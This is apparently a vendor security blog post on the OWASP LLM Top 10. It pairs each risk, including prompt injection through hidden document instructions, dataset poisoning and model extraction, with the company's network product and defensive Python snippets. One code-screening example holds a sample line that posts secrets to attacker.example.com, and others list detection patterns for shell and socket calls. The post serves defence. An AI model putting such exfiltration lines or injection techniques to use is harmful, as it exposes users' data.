The threats hitting AI systems today are already being exploited in the wild, and they’re bypassing the defenses that carried you through the last decade.
Firewalls, EDR (endpoint detection and response), SIEM (security information and event management), and IAM (identity and access management) were all designed for predictable, human-driven systems; they can’t see or stop this new class of AI-driven threats. Large Language Models (LLMs) don’t just process data. They generate, decide, and act based on inputs you don’t fully control. They pull from unvetted sources, form unprogrammed connections, and touch systems you might not even know are in scope.
Old defenses can’t parse a malicious prompt or see that a model was poisoned months ago. They can’t tell whether an output is safe until it’s too late. The Aviatrix Cloud Native Security Fabric (CNSF) is a pervasive, cloud-agnostic security solution built to address these AI vulnerabilities proactively. It fills those gaps by serving as the comprehensive protective layer for your entire single-cloud, hybrid, or multicloud network, providing high-performance encryption, visibility, segmentation, and security policy enforcement to detect and stop threats, AI-powered and otherwise, at runtime.
To meet these challenges head-on, we’re launching a two-part blog series that breaks down the AI vulnerabilities enterprises are already facing, and how Aviatrix CNSF neutralizes them at runtime, where legacy tools can’t.
We’re anchoring this series around the AI security frameworks being developed by OWASP — the Open Worldwide Application Security Project. Known for shaping industry standards like the original OWASP Top 10 for web app security, OWASP is now doing the same for AI, with new guidance tailored to language models and autonomous agents.
Part 1 (this post): The OWASP LLM Top 10, with definitions, attack scenarios, business impacts, CNSF mitigations, and in-the-wild examples.
Part 2: The emerging OWASP Agentic AI vulnerabilities — where the risk shifts from what AI says to what AI does.
The OWASP LLM Top 10: AI Vulnerabilities and How to Mitigate Them with CNSF
Here are the 10 risks in the OWASP LLM Top 10 and how Aviatrix CNSF can protect against them:
1. Prompt Injection
In prompt injection attacks, a malicious input manipulates an LLM’s instructions, making it perform unintended actions. For example, an attacker embeds hidden instructions in a document that, when processed, trigger data exfiltration. These attacks result in data theft, compliance violations and reputational damage.
In-the-Wild Example: Common prompt injection attack techniques include using multiple languages, personas, and conflicting instructions to trick LLMs into revealing sensitive data.
How CNSF Can Help
Aviatrix CNSF inspects both ingress and egress (incoming and outgoing) network traffic. By restricting and monitoring outbound traffic from LLM-connected systems, it blocks exfiltration paths and prevents attackers from stealing data. CNSF does not inspect or neutralize the prompt itself, but it neutralizes the threat: injected instructions are worthless if the stolen data has no way out.
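To make the egress-control idea concrete, here is a minimal Python sketch of an outbound allowlist for an LLM-connected service. It illustrates the principle only, not the CNSF implementation, and the domains and function names are hypothetical:

```python
# Minimal sketch of an egress allowlist for an LLM-connected service.
# Domains and helper names are hypothetical, for illustration only.
from urllib.parse import urlparse

ALLOWED_EGRESS_HOSTS = {"api.openai.com", "vector-db.internal.example.com"}

def egress_allowed(url: str) -> bool:
    """Allow outbound traffic only to hosts on the explicit allowlist."""
    host = urlparse(url).hostname or ""
    return host in ALLOWED_EGRESS_HOSTS

def guarded_fetch(url: str) -> None:
    # Any destination the policy does not name is blocked, which cuts off
    # the exfiltration path a prompt-injected model might try to use.
    if not egress_allowed(url):
        raise PermissionError(f"Egress to {url} blocked by policy")
    ...  # perform the request with your HTTP client of choice
```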
2. Insecure Output Handling
Insecure output handling occurs when employees use AI output without validation, potentially leading to code execution or compromise. For example, LLM-generated code with a hidden malicious API call is pushed to production without review. The business impact includes remote code execution and malware deployment.
In-the-Wild Example: In 2024, malicious instructions were found in AI-generated code on GitHub.
How CNSF Can Help
Aviatrix CNSF can segment your entire distributed network across clouds, containers, and environments to prevent attackers from moving laterally once they’re inside. It can segment execution environments and apply runtime traffic controls to block malicious outbound connections, taking the teeth out of an attack.
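As an illustration of the runtime-control principle (not CNSF code), the sketch below screens LLM-generated code for risky calls before it is allowed to run. The pattern list is deliberately simplistic and would complement, not replace, sandboxing and egress controls:

```python
# Naive pre-execution screen for LLM-generated code.
# The pattern list is deliberately incomplete; real screening belongs in a
# sandbox with egress controls, not a regex.
import re

SUSPICIOUS_PATTERNS = [
    r"\brequests\.(?:get|post)\b",  # outbound HTTP calls
    r"\bsubprocess\b",              # shell execution
    r"\bos\.system\b",
    r"\bsocket\b",
]

def screen_generated_code(code: str) -> list[str]:
    """Return the suspicious patterns found; an empty list means nothing was flagged."""
    return [p for p in SUSPICIOUS_PATTERNS if re.search(p, code)]

generated = 'import requests\nrequests.post("https://attacker.example.com", data=secrets)'
flags = screen_generated_code(generated)
if flags:
    print("Blocking execution of generated code; flagged patterns:", flags)
```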
3. Training Data Poisoning
In training data poisoning scenarios, malicious or biased data is inserted into training datasets to influence outputs. A public dataset is seeded with entries that cause exploitable responses. Training data poisoning can result in persistent bad outputs, reputational harm, and systemic bias.
In-the-Wild Example: Researchers found that they could exploit invalid trust assumptions and poison 0.01% of certain datasets for only $60.
How CNSF Can Help
Aviatrix CNSF can secure and authenticate access to training repositories to prevent unauthorized injection, keeping these datasets safe.
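Alongside network-level access controls, teams often pin datasets to known-good checksums so tampered data is caught before a training run starts. A minimal sketch, with hypothetical file names and placeholder hashes:

```python
# Verify a training dataset against a pinned checksum before it enters a training run.
# The file name and hash below are hypothetical placeholders.
import hashlib
from pathlib import Path

PINNED_SHA256 = {
    "train_corpus_v3.jsonl": "replace-with-known-good-sha256",
}

def dataset_is_trusted(path: Path) -> bool:
    digest = hashlib.sha256(path.read_bytes()).hexdigest()
    return PINNED_SHA256.get(path.name) == digest

dataset = Path("train_corpus_v3.jsonl")
if dataset.exists() and not dataset_is_trusted(dataset):
    raise RuntimeError(f"{dataset} does not match its pinned checksum; refusing to train")
```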
4. Model Denial-of-Service (DoS)
Attackers use Model Denial-of-Service to overload an LLM with complex queries and exhaust its resources. Imagine an attacker flooding an AI API with resource-heavy queries until it’s unusable. A DoS attack can result in outages, SLA violations, and operational disruption.
In-the-Wild Example: In May 2025, Cloudflare blocked a monumental 7.3 Tbps DDoS attack, the largest attack ever recorded.
How CNSF Can Help
Aviatrix CNSF can apply rate limits to prevent this type of attack and isolate abusive traffic sources.
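Rate limiting like this usually lives in a gateway or the network fabric. Purely to illustrate the mechanism, here is a small token-bucket sketch with illustrative limits (a 10-request burst, refilled at one request per second):

```python
# Per-client token-bucket rate limiter. Limits are illustrative.
import time
from collections import defaultdict

CAPACITY = 10          # maximum burst size
REFILL_PER_SECOND = 1  # tokens restored per second

_buckets = defaultdict(lambda: (float(CAPACITY), time.monotonic()))

def allow_request(client_id: str) -> bool:
    tokens, last_seen = _buckets[client_id]
    now = time.monotonic()
    tokens = min(CAPACITY, tokens + (now - last_seen) * REFILL_PER_SECOND)
    if tokens < 1:
        _buckets[client_id] = (tokens, now)
        return False
    _buckets[client_id] = (tokens - 1, now)
    return True

# A client hammering the endpoint is throttled once its burst is spent.
print([allow_request("noisy-client") for _ in range(12)])
```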
5. Supply Chain Vulnerabilities
Supply chain vulnerabilities are compromises in model dependencies, libraries, or APIs. For example, a plugin update injects a backdoor into an LLM app. These vulnerabilities can open the door to unauthorized access, malware spread, and data compromise.
In-the-Wild Example: Malicious models uploaded to Hugging Face with embedded malware.
How CNSF Can Help
Aviatrix CNSF can control and inspect traffic between AI components and untrusted services. It offers anomaly detection that flags unusual activity, helping security teams prioritize alerts.
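Because the Hugging Face incidents involved malicious pickle files, one complementary control is to inspect model artifacts before loading them. The sketch below is a naive illustration with an incomplete blocklist; signed artifacts or the safetensors format are the stronger fix:

```python
# Naive scan of a pickled model artifact for references to risky modules.
# The blocklist is incomplete (for example, STACK_GLOBAL references are not resolved);
# signed artifacts or safetensors are the stronger control.
import pickle
import pickletools

RISKY_MODULES = {"os", "posix", "subprocess", "builtins"}

def pickle_looks_risky(data: bytes) -> bool:
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL" and arg:
            module = str(arg).split()[0]
            if module in RISKY_MODULES:
                return True
    return False

benign = pickle.dumps({"weights": [0.1, 0.2, 0.3]})
print(pickle_looks_risky(benign))  # False: a plain data pickle references no risky modules
```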
6. Sensitive Information Disclosure
In this situation, LLMs unintentionally reveal confidential data. For example, engineers paste source code into ChatGPT, leaking proprietary algorithms. These disclosures can cause trade secret loss, penalties, and competitive disadvantage.
In-the-Wild Example: Samsung engineers leaked sensitive code to ChatGPT in 2023.
How CNSF Can Help
CNSF can help enforce outbound data inspection and block traffic violating egress policies. Even if an attacker manages to infiltrate a network, any sensitive information they can get is useless if they can’t smuggle it out.
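As a simple illustration of outbound data inspection (not the CNSF engine), the sketch below flags payloads that match secret-like patterns before they leave the network. The patterns are illustrative only:

```python
# Flag outbound payloads that match secret-like patterns before they leave the network.
# Patterns are illustrative; production DLP uses far richer detection.
import re

SECRET_PATTERNS = [
    r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----",
    r"\bAKIA[0-9A-Z]{16}\b",            # shape of an AWS access key ID
    r"(?i)\bapi[_-]?key\b\s*[:=]\s*\S+",
]

def violates_egress_policy(payload: str) -> bool:
    return any(re.search(p, payload) for p in SECRET_PATTERNS)

outbound = "Summarize this config: api_key=sk-placeholder-1234"
if violates_egress_policy(outbound):
    print("Blocking outbound request: payload matches an egress policy rule")
```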
7. Overreliance on LLMs
Overreliance on LLMs means blind trust in LLM outputs without verification. This can look like lawyers filing fabricated legal cases generated by AI or developers deploying AI-generated code without reviewing or testing it. This overreliance can lead to legal sanctions, reputational harm, and operational errors.
In-the-Wild Example: NY lawyers were fined for submitting fake citations from ChatGPT.
How CNSF Can Help
Aviatrix CNSF can enforce review steps for automated actions from LLMs, forcing teams to look over LLM outputs before acting on them.
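A review step can be as simple as a human-in-the-loop gate that blocks automated actions until someone approves them. A minimal sketch, with hypothetical function names; the input() prompt stands in for whatever review workflow a team actually uses:

```python
# Human-in-the-loop gate: an action proposed by an LLM runs only after approval.
from typing import Callable

def approved_by_human(action_description: str) -> bool:
    answer = input(f"LLM proposes: {action_description!r}. Approve? [y/N] ")
    return answer.strip().lower() == "y"

def apply_llm_action(action_description: str, execute: Callable[[], None]) -> None:
    if approved_by_human(action_description):
        execute()
    else:
        print("Action rejected; nothing was executed.")
```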
8. Insecure Plugin Design
Plugins or integrations can grant overly broad permissions. For example, an attacker could exploit an insecure plugin to access sensitive databases. These attacks can result in attackers escalating privileges once in the system and, eventually, data breaches.
In-the-Wild Example: Researchers exploited OpenAI plugins to reach unintended data sources.
How CNSF Can Help
Aviatrix CNSF can segment and control API calls made by plugins, preventing massive data breaches.
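The underlying idea is least privilege per plugin: each plugin gets an explicit scope list, and any call outside it is denied. A minimal sketch with hypothetical plugin names and scopes:

```python
# Least-privilege scoping for plugins: each plugin may use only the scopes granted to it.
# Plugin names and scopes are hypothetical.
PLUGIN_SCOPES = {
    "calendar-plugin": {"calendar.read"},
    "crm-plugin": {"crm.read", "crm.write"},
}

def plugin_call_allowed(plugin: str, required_scope: str) -> bool:
    return required_scope in PLUGIN_SCOPES.get(plugin, set())

# A plugin requesting a scope it was never granted is denied.
print(plugin_call_allowed("calendar-plugin", "crm.write"))  # False
```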
9. Model Theft
Model theft is the unauthorized extraction or replication of an LLM. For example, an attacker could query a model repeatedly to reconstruct its weights. Model theft can result in IP loss, competitive disadvantage, and legal exposure.
In-the-Wild Example: Researchers in North Carolina State University’s Department of Electrical and Computer Engineering demonstrated TPUXtract, a method for stealing an AI model.
How CNSF Can Help
With network-wide visibility and troubleshooting, Aviatrix CNSF can detect and restrict traffic patterns consistent with model extraction.
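Extraction attempts tend to show up as abnormally high query volumes from a single client. A minimal sketch of that detection idea, with an illustrative threshold:

```python
# Flag clients whose query volume over a sliding window looks like model extraction.
# The threshold is illustrative; real detection also weighs query diversity and timing.
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 3600
QUERY_THRESHOLD = 10_000

_query_history = defaultdict(deque)

def record_query(client_id: str) -> bool:
    """Record one query; return True when the client exceeds the extraction threshold."""
    now = time.monotonic()
    history = _query_history[client_id]
    history.append(now)
    while history and now - history[0] > WINDOW_SECONDS:
        history.popleft()
    return len(history) > QUERY_THRESHOLD
```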
10. Improper Access Control
Improper access control refers to weak or missing authentication for LLM systems or data sources. This vulnerability can allow a bad actor to access an LLM API without credentials. These scenarios can cause data exposure or unauthorized actions.
In-the-Wild Example: A hacker discovered a vulnerability in KAYAK that could allow an attacker to assume control of any account logged into KAYAK’s Android application.
How CNSF Can Help
Aviatrix CNSF can enforce identity-aware segmentation so only authorized identities reach LLM services. CNSF controls key off identity rather than ephemeral attributes like IP addresses, which can change, making access decisions safer and more reliable.
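The sketch below illustrates the identity-aware principle: access decisions key off a verified identity rather than a source IP. The identities and service names are hypothetical:

```python
# Access decisions key off a verified identity, never a source IP.
# Identities and service names are hypothetical.
AUTHORIZED_IDENTITIES = {
    "svc-analytics@example.com": {"llm-inference"},
    "svc-etl@example.com": set(),  # authenticated, but not authorized for the LLM service
}

def may_reach(identity: str, service: str) -> bool:
    return service in AUTHORIZED_IDENTITIES.get(identity, set())

print(may_reach("svc-analytics@example.com", "llm-inference"))  # True
print(may_reach("203.0.113.7", "llm-inference"))                # an IP is not an identity: False
```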
From Words to Actions: The Next AI Security Frontier
The OWASP LLM Top 10 is proof that AI has created a new class of vulnerabilities your legacy tools can’t stop. These attacks are happening now, slipping past defenses that were never built for machine-driven decision-making.
But this is only the first wave. LLM risks are about bending language to an attacker’s will. Next comes the leap from influence to control, when AI doesn’t just generate answers but executes actions across your infrastructure.
In Part 2, we’ll step into the world of Agentic AI: where bad prompts turn into bad actions, and the blast radius multiplies at machine speed. That’s where the stakes get real, and where your security strategy must change the fastest.
Learn more about how Aviatrix CNSF can prevent AI accidents.
Schedule a demo to see CNSF in action.
References
arXiv, “Poisoning Web-Scale Training Datasets is Practical,” February 20, 2023, https://arxiv.org/abs/2302.10149.
AWS, “Common prompt injection attacks,” accessed August 19, 2025, https://docs.aws.amazon.com/prescriptive-guidance/latest/llm-prompt-engineering-best-practices/common-attacks.html.
Cloudflare, “Defending the Internet: how Cloudflare blocked a monumental 7.3 Tbps DDoS attack,” June 19, 2025, https://blog.cloudflare.com/defending-the-internet-how-cloudflare-blocked-a-monumental-7-3-tbps-ddos/.
DarkReading, “With 'TPUXtract,' Attackers Can Steal Orgs' AI Models,” December 13, 2024, https://www.darkreading.com/vulnerabilities-threats/tpuxtract-attackers-steal-ai-models.
Forbes, “Samsung Bans ChatGPT Among Employees After Sensitive Code Leak,” May 2, 2023, https://www.forbes.com/sites/siladityaray/2023/05/02/samsung-bans-chatgpt-and-other-chatbots-for-employees-after-sensitive-code-leak/.
GitProtect, “How Attackers Use AI To Spread Malware On GitHub,” March 18, 2025, https://gitprotect.io/blog/how-attackers-use-ai-to-spread-malware-on-github/.
HackerOne, “How an Improper Access Control Vulnerability Led to Account Theft in One Click,” November 6, 2024, https://www.hackerone.com/blog/how-improper-access-control-vulnerability-led-account-theft-one-click.
OWASP, “OWASP Top 10 for Large Language Model Applications,” accessed August 19, 2025, https://owasp.org/www-project-top-10-for-large-language-model-applications/.
ReversingLabs, “Malicious ML models discovered on Hugging Face platform,” February 6, 2025, https://www.reversinglabs.com/blog/rl-identifies-malware-ml-model-hosted-on-hugging-face.
Reuters, “New York lawyers sanctioned for using fake ChatGPT cases in legal brief,” June 26, 2023, https://www.reuters.com/legal/new-york-lawyers-sanctioned-using-fake-chatgpt-cases-legal-brief-2023-06-22/.
WIRED, “A Single Poisoned Document Could Leak ‘Secret’ Data Via ChatGPT,” August 6, 2025, https://www.wired.com/story/poisoned-document-could-leak-secret-data-chatgpt/.